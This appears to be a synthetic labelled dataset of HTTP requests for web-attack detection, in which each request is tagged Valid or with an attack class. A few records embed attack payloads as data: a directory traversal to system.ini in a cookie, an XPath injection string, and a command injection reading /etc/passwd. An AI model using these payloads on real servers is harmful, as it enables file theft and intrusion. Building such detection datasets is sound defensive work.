POST /rrqo8ctSii0SHuriEedz/fQHPjo78/htpassCL7/e5W/finsosearttqwm.jpg? HTTP/1.0
Content-Length: 105
Content-Language: i6a,gImaN
Content-Encoding: compress
Content-Location: /ec6cnfwm/rmn8w/iiaZa.jpg
Content-MD5: cjByUHlzeWhFcm5raW5leQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Aug 09 18:43:01 GMT
Last-Modified: Thu, 20 Nov 08 13:59:12 UTC
Host: 156.174.34.85:80
Connection: keep-alive
Accept: application/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 132.107.60.185
Cookie: yccsandersaj=k2-vURHq3;hHolsHn=175594;eahR5ecafeehm=tx;itahqWctx=5585
Cookie2: $Version="01"
Date: Tue, 24 Mar 09 12:48:55 GMT
ETag: W/"QOlNzBVj@1mHJeE9wu-"
Expect: n2se=etayn;fehdhorm=srciils
From: sneehouu@vual.net
If-Modified-Since: Sat, 14 Feb 04 02:34:54 CET
If-Unmodified-Since: Sun, 28 Oct 07 02:49:18 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Jan 06 24:20:33 UTC
Max-Forwards: 2
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dGp4cnQ6U2VvaHdsbmE=
Range: -1123,49-40,9-39799
Referer: /anfirdio/to8o.asmx
TE: trailers
Trailer: Accept-Language
User-Agent: owqhom5hDioneDos5isv
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1536x3422
Via: HTTP/8.4 www.EuEtc.jpg
Transfer-Encoding: ptei3w; conb2=m4toa2
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 817 144.31.134.157 "syge" "Mon, 18 Jan 10 11:34:49 GMT"
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

et7zbde=74262605&28LY3c0dTAGK=eCQTnI8x-Iw&ndlhKfmcu=h.uOO7tz&jufprgjnn=8es&ho1=fw6 &08COjIMpxU=qmmndbk ts

End - Id: 7098
Start - Id: 16904
class: Valid
GET /ZP_WO/tfyg/wetb8o3e3l/ezkp/rVpjBSgk84bCqxH/K1C9WOvar/t6ySeJ8Yw/sXZ5eTorH637iVA.htm? HTTP/1.0
Host: 158.57.163.76
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, identity, identity;q=0.9
Accept-Language: rdreatrs-nnPee, huhroizl-du6f3mar, lqrewnru-p;q=0.6, 9kN-e0i7ldi, cae4c-bimDena
Cache-Control: max-stale
Client-ip: 254.25.138.231
Cookie: lyynLSydittai=@0;tdOsih=nnetcatet;jrhbYsoeeitgstm=543;6tuaaielnssdoit=04440578;aftiioNp2occe=7848
Cookie2: $Version="10"
Date: Fri, 20 Nov 09 18:30:58 UTC
ETag: "jmQGa4xHf2Ya1mG"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Sat, 09 Feb 08 16:02:35 UTC
If-Unmodified-Since: Thu, 30 Mar 06 02:38:23 CET
If-Match: "Pu-nTLAMr83EUCOAj"
If-None-Match: *
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 1222
MIME-Version: 6.2
Pragma: ce7baoit='eex'
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: eIrf aCo5gdr=nhHiR
Range: -3
Referer: http://www.sgeetmo.net/dtioii/rqlln6o/eop8.bin
TE: chunked;q=0.5,gzip,trailers
Trailer: From
User-Agent: Mozilla/8.1 (compatible; MSIE 8.5; Windows NT; uoVaob)
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: HTTP/9.6 189.134.3.243
Transfer-Encoding: identity
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 144.164.88.102
X-Serial-Number: 81135810517
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16904
Start - Id: 33982
class: Valid
POST /rL/tr/et3nvapsd/em/nwblfhqunrs5nhcxhaqe/1m0e3xuie/wdit/te/nnnj.htm? HTTP/1.0
Content-Length: 19
Content-Language: cEtjhlen,shcvw
Content-Encoding: compress
Content-Location: /egivuaj/ano0e1c/ahun.dll
Content-MD5: dW50dG5pZW10aWM0Y2kwbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Jan 05 15:20:12 GMT
Last-Modified: Fri, 27 Jan 06 16:05:42 UTC
Host: 216.53.188.150:80
Connection: utct
Accept: audio/basic;q=0.8, audio/basic, audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 68.254.57.254
Cookie: khoLhryeeraE=nosI4N;ri1DfH8m=ocebe2sotci1coW;imitncshai=35;Twk166ahst=shTOl;yosEantLY=tlodb27io
Cookie2: $Version="260"
Date: Sat, 03 Jul 04 15:28:58 UTC
ETag: "_a0_64jbSCr6SnLUs"
Expect: 100-continue
From: 2lttn@aSarnOJ.de
If-Modified-Since: Tue, 16 Feb 10 08:02:01 CET
If-Unmodified-Since: Fri, 29 Jan 10 11:41:03 CET
If-Match: "bGHkmOGy7KzZ7K_u"
If-None-Match: "VOM_jy.NNTKa--chLYO"
If-Range: "q2UWrNMl36lXY9lxM"
Max-Forwards: 5
MIME-Version: 6.3
Pragma: uUte='kaf93bh'
Proxy-Authorization: Basic Y3RpbGhiaEU6aWdubHRobVI=
Authorization: nesrib ojSla99R=pbhh5S
Range: 74641-,-087
Referer: http://d2rotiaj.com/erEhnat.php
TE: trailers,gzip;q=0.3,deflate
Trailer: Authorization
User-Agent: angpcgo7 (xb0VqEz2IW; oXoDv.3@vf; rw3R_ov; vlVGqA; bvKXKcdA)
UA-CPU: Sparc
UA-Disp: 370,676,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 354x173
Via: hiSn2/6.6 www.Ix9lrck.js, FTP/8.6 www.UA9st.jpeg:7713
Transfer-Encoding: compress
Upgrade: tiy/3.6, xma/2.7, hcenti/3.5
Warning: 702 237.154.44.239:055 "adahlhccmtnRndtt" "Thu, 03 Sep 09 08:04:46 UTC"
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

svubh4ll26ho=035440

End - Id: 33982
Start - Id: 45317
class: PathTransversal
GET /o1m/1Dmsdm5GY.cgi?g00y6ssatim=r9ytqee8h8dentsl&Opn=iseCfdszket&oEhvotemit3akro=55 HTTP/1.1
Host: www.r0dcn.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: t-tteqts, eprso-2agaortd;q=0.9, ttea7d1-p, tunse-gnotyw
Cache-Control: no-transform
Client-ip: 221.34.229.122
Cookie: eMtrcod=..\..\..\..\..\..\..\..\..\WINNT\system.ini
Cookie2: $Version="154"
Date: Tue, 13 Jan 09 03:50:42 GMT
ETag: W/"L@.MOteuK0dRFhGjRtBY"
Expect: aThl=ptsllw;brtz=yAtoa3t
From: a4intom@hlkrmt.biz
If-Modified-Since: Tue, 28 Apr 09 07:33:58 UTC
If-Unmodified-Since: Tue, 07 Sep 04 10:32:49 UTC
If-Match: *
If-None-Match: *
If-Range: "sGqva@JMfanmMh6bX4dU"
Max-Forwards: 06
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest username="suDgtorl"
Authorization: unwol eoeor=occeafsa
Range: -476788,-367716,-3
Referer: /kalrm/eu1k/md9os/sjertt/A8vawep.ace
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.7 (Windows; U; WinNT 5.0; om-6e; rv:3.0.2) Gecko/27444601
UA-CPU: x86
UA-Disp: 4810,872,32
UA-OS: Win95
UA-Color: color8
Via: 8.0 141.33.253.42, 3.5 www.Titf8.htm
Transfer-Encoding: deflate
Upgrade: ee3n/0.9, she/0.7
Warning: 669 162.117.163.45 "raseAio2cowe" 
X-Forwarded-For: 74.25.201.88
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 45317
Start - Id: 49963
class: XPathInjection
GET /aKEQHU@7T/aGSb1PtBzP/hVl.msf?tIriw=7qWB&bhylfiraftogoe=8G.&eif81aactrwehoa=31++or+1%3C+da%2FeicWf%2Fqahovc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D18%5D++++or+7016%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&utiidusZ=rgee1mVRdaNaDbts&ioan5mzle=35072319&koaeKh=insert%3C%28cmdntmpt&7aocs6smcaohN=tac0 HTTP/1.1
Host: www.tEcntlMef.cz:5
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-jp;q=0.5, windows-1252, iso-8859-3;q=0.0
Accept-Encoding: deflate, identity;q=0.1, deflate;q=0.2, deflate, identity
Accept-Language: nVelxofo-j5ngh
Cache-Control: max-stale
Client-ip: 48.67.50.33
Cookie: eng9munpCcs2ao=s9dhUNlhW;uTetCtczrn=084043
Cookie2: $Version="378"
Date: Sun, 07 Jun 09 08:19:00 UTC
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: jOaulrtZ@oAt2Eo.gov
If-Modified-Since: Tue, 06 Feb 07 11:19:53 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: "Cp3Q1Puvr6h99R7X5L"
If-None-Match: "hvJIOvQz9xhA@2j0fp"
If-Range: *
Max-Forwards: 679
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: Digest username="eo31e"
Authorization: NTLM ZW50ZU9idGRtb295OW50eWFPeUp0MHRubXM3SHRzdXRic3Vybg==
Range: 73758-,-8229
Referer: http://www.i8trib.fr/zxef.png
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/3.0 (X11; U; Solaris 9.6; nT-rh; rv:4.6.6) Gecko/72087747
UA-CPU: x86
UA-Disp: 5750,1984,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 207x5488
Via: 7.9 56.93.75.143
Transfer-Encoding: gzip
Upgrade: pennen/7.5
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 199.10.120.226
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49963
Start - Id: 8924
class: Valid
GET /r8mmneesg/MltH/amldeatusnGinttrdni3/sijfwwgvXji/a7MlsstIwaaet.css? HTTP/1.0
Host: www.ftap1tfEt.net
Connection: ekpr
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: igrcaInS-f, t9nia-asjad9;q=0.8, uhapR-Iaty;q=0.3, so-nbym, t0-0mtO
Cache-Control: only-if-cached
Client-ip: 214.41.97.175
Cookie: ef=hboot.inistyleahttgot;jkiohhhaoi=9rilf;gsvactpi6oLnM=eegwDQc7v;ytie4oal=523;nto=0d\
Cookie2: $Version="266"
Date: Sun, 06 May 07 17:52:51 CET
ETag: "UFDP4HrPU@2cKXj"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Wed, 20 Dec 06 13:26:47 GMT
If-Unmodified-Since: Wed, 29 Jun 05 16:31:21 GMT
If-Match: *
If-None-Match: "QtoQ@sN0Dmea_GDtdzP"
If-Range: Wed, 06 Jul 05 10:21:56 GMT
Max-Forwards: 3810
MIME-Version: 1.1
Pragma: ylsHiiid=sfob
Proxy-Authorization: Basic cm9kMGhuMjpvYUl5enZvaA==
Authorization: Basic MXREeWl0YWg6aWFlOA==
Range: 7-3572
Referer: http://toelno.uk/tYaOj/monayson/s64m.tar.gz
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.8 (Windows; U; Windows NT 4.4; 92-C6; rv:2.0.8) Gecko/92804737
UA-CPU: 68000
UA-Disp: 065,7616,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3660x726
Via: 5.8 247.115.225.145, FTP/8.9 www.pteg.html, peu/1.2 www.lejttTe0.gif
Transfer-Encoding: fteonn; o9tee=roTNnf
Upgrade: D54Tc/5.2
Warning: 571 130.163.218.71 "0rarimveh" "Tue, 26 Dec 06 12:43:48 GMT"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 010709448680546
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8924
Start - Id: 15994
class: Valid
GET /lihfbmm8/ckiMi-YcQCE-F/byFKs9DRpvIn/rnfev7wt5oyhtml/etnrd/eLG5/i_drC.3Iyw8@46C3PD/iWEVx08gq2WcU6sD/QWXf3select1RvUwinnt/oiiieTtsytodrp/E8bPl7yDsl-F/Glrmvar2nodeSKRx.js? HTTP/1.1
Host: www.leuidA.biz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-8, cp-932;q=0.9
Accept-Encoding: compress, gzip;q=0.5, deflate, compress
Accept-Language: Fei-bofYn, i0T-sglt;q=0.0
Cache-Control: only-if-cached
Client-ip: 10.183.212.56
Cookie: IFR4netcatOj=794;sl0=tstuifh5h6;bE5shrnT2ao=of7niass8yotyetesI
Cookie2: $Version="79"
Date: Mon, 13 Dec 04 11:04:20 CET
ETag: "foHX3bXLfs1bsOyu"
Expect: 5pnte
From: aebIo@aienFcnaoN.cz
If-Modified-Since: Mon, 09 Oct 06 12:04:56 UTC
If-Unmodified-Since: Tue, 12 May 09 03:09:15 UTC
If-Match: *
If-None-Match: "NQq4up-uN__TvD.uJSBw"
If-Range: "tgjql-3qHmA9X0dBVY"
Max-Forwards: 2023
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTFlYWhlY2FpYW5hMGlXbGhkYm5sbkhqZm5lQW5ucmVjeG1hbzZ3bjJ3aXM=
Authorization: emsS3H to7al=yie9
Range: 4-136390,-06191
Referer: http://wrex.uk/etOhae/n0eoldcn.pl
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: eLecS8iehnuse
UA-CPU: PowerPC
UA-Disp: 9829,461,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1814x7324
Via: 5.4 www.izo5h.html
Transfer-Encoding: compress
Upgrade: aieRqe/7.7, c9oee/9.2, Halyoi/5.2, nsb/5.8
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 157.210.6.61
X-Serial-Number: 606819653
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15994
Start - Id: 15015
class: Valid
GET /e.z/enbWlte8epbams5wu/B6r8n4Sitperlg/lPa/5etugEmIpeba/t0_60rVmAc-UCwq/n6dKr2U_BUswi19oH3/KIEKaMdi47rTfB@/yWpsf/Eye.js?ternaBrh6o=983388&bnAoSvfes3icazt=768&5H=hBpTW&7weo0S9dte=aatnLStq&zo-XU8zservicesdocumentao=oeerd&roi8hrb4=tl0dst&iset=++%2Foyoae%3Auia+5&pxirtj8ilqyn=garuoN&aaAaQaa=i&t9mahbemr=n4ms7ametmOep HTTP/1.1
Host: www.itgzhsel.uk:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress, identity;q=0.3, deflate;q=0.0, gzip;q=0.6, deflate
Accept-Language: h287-ntts7, oesvPEd-0Ea7e0p;q=0.9, gearcerR-yo;q=0.8
Cache-Control: max-stale
Client-ip: 70.242.23.96
Cookie: pLee5i=0649
Cookie2: $Version="375"
Date: Sat, 22 Sep 07 09:28:23 CET
ETag: W/".hzPqiXYixjS-SyfCWlj"
Expect: a9igna
From: emft@nUDA.it
If-Modified-Since: Wed, 14 Feb 07 06:26:15 UTC
If-Unmodified-Since: Tue, 01 Sep 09 21:41:00 GMT
If-Match: *
If-None-Match: "l5ufZTNXoKKawnKmf"
If-Range: Sat, 16 Apr 05 20:34:12 CET
Max-Forwards: 516
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: lers dEomna=enMS
Authorization: NTLM bGw3dHByZW9pdHRob2UwbjdoNGhlZG00Z3dlYWpFbmdpbnBobmg=
Range: -458527,888376-56056
Referer: http://gerlqj3.fr/tnaR.asmx
TE: chunked;q=0.5,deflate;q=0.6
Trailer: Upgrade
User-Agent: srmdhe/6.3.2
UA-CPU: StrongARM
UA-Disp: 5420,670,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: eaIit/3.8 65.222.6.202
Transfer-Encoding: gzip
Upgrade: rotyo/7.0, 8her6/3.5, erjkwi/8.1, 4env6/4.2, oh0n/5.8
Warning: 742 www.inttce.js "oAn7ShenPaoetctTnl" "Sat, 02 Dec 06 12:45:12 CET"
X-Forwarded-For: 185.54.94.71
X-Serial-Number: 958943826904140
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15015
Start - Id: 15059
class: Valid
GET /2h632e8/Sn6nazliusjEr.asp?hmntatl=nand&stkvae6e=nM.&Hdbr=a9nTL&oFntBasco=mhe HTTP/1.0
Host: www.tsrtMt1e.cz:80
Connection: ohsqrwY
Accept: */*
Accept-Charset: iso-8859-4;q=0.3, gb2312, windows-1258, iso-8859-3, windows-1255;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 166.30.5.248
Cookie: eZshcn=99;iIuC8sE=jWpdu
Cookie2: $Version="71"
Date: Sun, 12 Nov 06 06:24:50 GMT
ETag: W/"BPURqs9TynV9AREMCpZ"
Expect: 100-continue
From: shdojh@32thstuem.biz
If-Modified-Since: Thu, 07 Dec 06 12:33:16 CET
If-Unmodified-Since: Thu, 19 Aug 04 11:22:25 GMT
If-Match: "Em.71T7P3Li5N5G468ta"
If-None-Match: *
If-Range: "AOqE1ifACBgYFHSK6h"
Max-Forwards: 7880
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest username="ttnditw"
Authorization: Basic ZXRsZXRub3I6dHRibmc=
Range: 4-,-3,94-
Referer: /azmhuyoi.asmx
TE: gzip,deflate
Trailer: Via
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 8.2; c5-eL; rv:9.7.1) Gecko/12836721
UA-CPU: MIPS
UA-Disp: 1398,2099,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 656x086
Via: FTP/7.9 140.95.236.145, c5of/8.6 www.mlem9n.html, 4.8 www.tnbn.jpeg:160
Transfer-Encoding: gzip
Upgrade: lahjl/3.1, i3se/5.5
Warning: 670 120.59.241.81 "srredysdrtssiTT" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15059
Start - Id: 36831
class: OsCommanding
GET /t1V8Xt.y/oOd398uben4tdc/t0bgtFrkVgJ_I3A/in/Bj/zhtvherlcLeEx/yeenbn/Imb99ANd6irnpohta.dll?eskiz=169566&4eAalo0dgttl=589&5Qa78UWX=deaohtaccesuthttpch&eubip6e=nrt&ol=maoowBt227snedbed&or=++aerh+inr&v.379window.openlzautoexecg=es%3E0cprocessing-instructioncb%2Fsn%5DHt&t7a9dn4eeo8ne=rltnH%26rtey&eesat8i=%250a++cat++%250a++++%2Fetc%2Fpasswd%250a&exea=7o4PqB&5imqadtei4=ve&wot=nxterm HTTP/1.0
Host: 161.94.62.128
Connection: Yrteewvr
Accept: */*;q=0.0
Accept-Charset: iso-8859-6, iso-8859-8-i;q=0.0, iso-8859-2;q=0.4, koi8-r;q=0.3, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: gertyOn=dethNyeh
Cookie2: $Version="430"
Date: Sun, 15 Jan 06 01:12:10 UTC
If-Unmodified-Since: Thu, 04 Dec 08 07:06:50 UTC
If-Match: *
Max-Forwards: 1616
Pragma: no-cache
Authorization: phept ey3ihi=egnderNi
Referer: /s4gicuse/h5adetn/sgtcc/yjse8nYo.gz
User-Agent: riRit0nzh/5.7.8.6
UA-CPU: PowerPC
Via: HTTP/9.6 www.dAbae6.jpg, estAtA/2.3 51.102.213.86, 8.2 142.86.183.7
Transfer-Encoding: deflate

null

End - Id: 36831
Start - Id: 26298
class: Valid
GET /aRbZ6ROsK09_b-1/lyloj1EGCg.L2xo1/5OW5Unz7/7srrfp/bMoOwYnxXMnV9VMwN3X/tPsNw@vSKro44Uz-/yYXA/r32/aib2nf-G-wac3mH/h1bh.asp?xJe5metaOyyLJ-=ldae&geosarodicmefaa=w&Orgt=bRwKw&0ig7gt6=36&Em2idn=d.unc6A HTTP/1.1
Host: 83.54.54.107
Connection: zloxnid
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=34
Client-ip: 212.123.6.21
Cookie: lta=932538
Cookie2: $Version="03"
Date: Thu, 23 Dec 04 24:13:54 CET
ETag: W/"A1p6v@r8DNg9iIPR-h3"
Expect: 100-continue
From: kadm@gerbpeiwsn.org
If-Modified-Since: Wed, 22 Feb 06 05:09:08 GMT
If-Unmodified-Since: Mon, 12 Jun 06 20:54:11 GMT
If-Match: "0qAd_2XYrSU2FRdzIDu"
If-None-Match: "pOhinYi68-gDuD-2cGWo"
If-Range: *
Max-Forwards: 1004
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic Zmhpc2U6c3RlaWlhbzE=
Authorization: NTLM c2luc3d0aWlhdGVzMncwdGM2dHJwbHBPeWxzZXByZW5haW5hdG9u
Range: 338-840605
Referer: /satyd/eeleoena/6i62T.tiff
TE: gzip,gzip
Trailer: Date
User-Agent: Mozilla/9.5 (compatible; tDTa; Solaris; enuStbpieh; eaoaedcoe)
UA-CPU: MIPS
UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3902x9522
Via: 2.7 77.83.226.23
Transfer-Encoding: gzip
Upgrade: 7tTa/7.8, stro8/9.2, aysmr/9.8
Warning: 505 www.i0e1ateH.gif "k3cpb0eut6nh3" "Fri, 02 Jun 06 13:47:27 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26298
Start - Id: 31962
class: Valid
GET /4w/4tolnwdcotszsejg/g@Hetcfmeta1styleF99NE/esoll/hMi3hLzQJ/dHvLgwyNnkEd9lF/Gbf7neTnlrLTI/Jk/fAOfp3LAQ5jZkgLdw/vcteFb7eEyoqdESani/MzconnectWqand%uMRA3IeSy/cJp7.swf?etdptueufl=tepje5rNaHhyoc&sfi=tevale%26sim%5C1andtstdinwono&dioeemaniteoan=on+jgrh%5B&UKXe=i1o&Ttoawexono=71840&0UphphtpassUN=eot%3D2divbt&Syan=11&V6.0cdX=0581547&l9KIjv=7&7ymkPminyChttps=uerssrMc6i%24iqi&1Ss3amtj=roto HTTP/1.0
Host: 53.63.195.99
Connection: ekfnn1i
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity, identity;q=0.3, compress, deflate;q=0.4
Accept-Language: ezhSh9-ttn3ded;q=0.8, wihb-c, xi-ea, 3attg2fe-ncmc, sOt-ian
Cache-Control: no-transform
Client-ip: 105.203.11.82
Cookie: aanw=1updatendivs;ymhhyhsen=0ti;jas=bOctmbvht
Cookie2: $Version="097"
Date: Wed, 26 Aug 09 10:58:28 GMT
ETag: "KCBOVIk-l57l3RK7"
Expect: oh4tn
From: wamiac@4nepios.fr
If-Modified-Since: Sun, 12 Jun 05 03:34:21 GMT
If-Unmodified-Since: Sat, 27 Nov 04 12:46:10 CET
If-Match: *
If-None-Match: *
If-Range: "MUszFuCrnank7.GpTI"
Max-Forwards: 5
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: etsnds WdnRHatk=rhdNp
Authorization: latoT bl8e=teIuh
Range: -3
Referer: /eoOEr/Ytan9.ace
TE: chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: tdNRnfAb http://www.cOhe.ch
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: FTP/6.4 4.110.146.147
Transfer-Encoding: paiD; e1Bas3ed=luiali
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 372913
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31962
Start - Id: 15952
class: Valid
GET /CbCN-/egeOaogoNq3uezsd2dE/o@B/bgetassPMia7tzolh/ZohtaccesbT_M/t0v/harsg/tjtjRSvn/jfS/eDdhbe5eeAsee.dll?tlbytrzeinoZ=rc%7Eheb%3BijmKihaving&ou5h=89&hsqnv=etdtorxro&OJMqDform=altwu+g7&Pan8o7ot=tTBGr&7zwr2ea97uvtAE=299&6gesmdnewygl=9542717&tilminwe=897&Iuhha=ocb&uoiwtacitbe9g=01eevbscript%2F%3BbA%25&ehhpaNaslo=rj8DFtNSgqPA&asmhEznnnbae=08851481 HTTP/1.0
Host: www.ldhe.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=32
Client-ip: 240.237.65.163
Cookie: UrupdateSdsx=17113;1nys=25466510;nE=jPP0;heetp=352657
Cookie2: $Version="326"
Date: Mon, 23 Jun 08 06:11:24 UTC
ETag: W/"C9Iv_vJKv0JQVdgIJm@l"
Expect: ceitrdo
From: foupIigo@8aw9mD.net
If-Modified-Since: Sun, 20 Feb 05 04:00:16 CET
If-Unmodified-Since: Tue, 16 Mar 10 11:46:15 UTC
If-Match: *
If-None-Match: "M09@u8mNWNKdpj1T"
If-Range: Wed, 28 Oct 09 01:50:08 GMT
Max-Forwards: 585
MIME-Version: 7.5
Pragma: 21le='wdr'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: NTLM ZXdoZW5pZ3B3YXJsZWlDaWhOTGN3c2pzZWFhZWRuM3BzQm9tbWVvZ2VnYWphNQ==
Range: 00424-7094,829-49684
Referer: http://nMept.net/s3eolar/tsatrxc/679tL/NfeTah.css
TE: chunked,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: aT5mqrtiln
UA-CPU: StrongARM
UA-Disp: 9788,9519,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7490x6757
Via: 2.4 179.148.212.98, FTP/7.0 www.Ciw9r.js, scV/7.8 227.216.227.244:681
Transfer-Encoding: tIyd
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 85.163.36.22
X-Serial-Number: 902795825
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15952
Start - Id: 11947
class: Valid
GET /1ne5mu/4Zi9eT.msf?aertuitadfgl02o=s4t&L2bedbe=943&zarfnmhnxcm=o-var&Taen=e%28&aanbaOilfiiXasa=se&uPexurrobiotR=c&Qtmpf.d=2558634938&gYpbF=571&Jadmin08admine_=4087616&F9aKnR=Hua&kXwlinkwl9ivA=oluz&Cy@Pinxp_hbetween=7%7Ea+x HTTP/1.1
Host: www.6eaw4men.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: httclaa-iyeehsfQ
Cache-Control: no-cache
Client-ip: 60.133.55.180
Cookie: neeoiIbt=fe3t
Cookie2: $Version="91"
Date: Thu, 02 Feb 06 16:09:45 CET
ETag: "Z@_jrx68mt-s@PF5"
Expect: d3ttaaTm=shholg;tI4city=eotlhHha
From: RoReztii@imT2.gov
If-Modified-Since: Fri, 02 Oct 09 04:08:24 GMT
If-Unmodified-Since: Fri, 07 Dec 07 14:55:06 UTC
If-Match: "nz4FEU3ZXsmlijK"
If-None-Match: "Ux2ZIL9zM3V.GIdyiQY"
If-Range: Sat, 14 Nov 09 02:34:10 UTC
Max-Forwards: 674
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic b1NpYm5sbjpmZXJuZWk=
Authorization: Basic YXNhaVRrOmxzaGVlY2lo
Range: 63547-,33996-170
Referer: /seat/mb2unn/Mit7nt/btSo/tieteq.msf
TE: gzip;q=0.1,trailers,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: tyaxLUr http://www.algcttdd.st
UA-CPU: PowerPC
UA-Disp: 953,518,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: 0.8 www.tfBgte.tiff, HTTP/1.6 217.152.176.204, 4.9 70.30.172.36
Transfer-Encoding: iorcen
Upgrade: tzkoi/0.0, renmir/0.0, tssa/5.2, Rlt8/0.2
Warning: 828 246.8.109.215 "s90oa6ht" "Sun, 29 Jul 07 11:07:18 GMT"
X-Forwarded-For: 176.49.69.217
X-Serial-Number: 7861742222563
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11947
Start - Id: 15149
class: Valid
